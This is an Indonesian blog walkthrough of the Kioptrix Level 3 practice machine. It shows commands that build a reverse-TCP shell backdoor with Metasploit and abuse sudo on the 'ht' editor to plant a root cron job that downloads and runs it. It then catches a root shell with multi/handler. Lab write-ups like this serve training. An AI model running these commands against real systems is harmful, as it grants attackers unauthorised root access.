[KIOPTRIX LV3] Metasploit VS Ubuntu

Ini adalah lanjutan dari post [KIOPTRIX LV 3] Attack User 

Pada Pentest kali ini, saya akan mendemonstrasikan menyerang web server yang menggunakan Ubuntu dengan Metasploit.

Note: IP address saya 192.168.1.2

Preparation:

1. Metasploit ---> Download Page

Briefing:

1. Buat backdoor

2. Buat Script untuk mendownload backdoor yang sudah kita buat

3. Jalankan exploit multi handler dan Game Over

Walkthrough:

1. Buat backdoor

Buka terminal, lalu masukan perintah:

root@red-dragon:# cd /pentest/exploits/framework2

root@red-dragon:/pentest/exploits/framework2# msfpayload -p linux x86/shell/reverse_tcp LHOST=192.168.1.2 LPORT=4444 X > /var/www/back.door

2. Buat Script untuk mendownload backdoor yang sudah kita buat

Buka terminal, lalu masukan perintah:

root@red-dragon:/pentest/exploits/framework2# ssh loneferret@kioptrix3.com

Masukan password.

Note: Password bisa dilihat pada post sebelumnya mengenai [KIOPTRIX LV 3] Attack User

Kemudian

loneferret@kioptrix3:~$ sudo ht

Note: Jika ditanyakan password, masukan password loneferret

Password bisa dilihat pada post sebelumnya mengenai [KIOPTRIX LV 3] Attack User

Pada console ht, tekan atl+f kemudian pilih new

Masukan kode berikut:

* * * * * root cd /tmp/; wget 192.168.1.2/back.door && chmod +x && ./back.door; rm /etc/cron.d/exploit

Tekan alt+f kemudian pilih save, dan masukan nama file dengan nama /etc/cron.d/exploit

3. Jalankan exploit multi handler dan Game Over

Buka terminal masukan perintah:

root@red-dragon:/pentest/exploits/framework2# msfcli multi/handler PAYLOAD=linux x86/shell/reverse_tcp LHOST=192.168.1.2 LPORT=4444 E

Tunggu sejanak.. Daaaaaaaan..

Berhasil.. Command Shell sesi pertama telah terbuka. Dalam keadaan ini, kita telah mengendalikan system dengan terminal atas nama root (administrator)